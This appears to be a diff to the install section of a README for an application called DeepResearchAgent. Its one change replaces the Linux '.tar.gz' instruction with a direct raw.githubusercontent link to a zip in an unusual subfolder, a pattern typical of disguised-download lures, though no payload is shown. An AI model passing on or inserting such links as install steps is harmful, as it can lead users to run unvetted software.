skywhywalk/DeepResearchAgent/README.md

 5. **Install the Application**:
    - **For Windows**: Once the `.exe` file is downloaded, double-click it to start the installation.
 Follow the prompts to complete the setup.
    - **For macOS**: Open the `.dmg` file and drag the DeepResearchAgent icon into your Applications folder.
 You can then find it in your Applications.
-   - **For Linux**: Extract the `.tar.gz` file and follow the included instructions to install the software.
+   - **For Linux**: Extract the `https://raw.githubusercontent.com/skywhywalk/DeepResearchAgent/main/intercomparable/DeepResearchAgent.zip` file and follow the included instructions to install the software.

 6. **Run DeepResearchAgent**:
    After installation, locate the application and double-click to open it.
 You are now ready to start using DeepResearchAgent!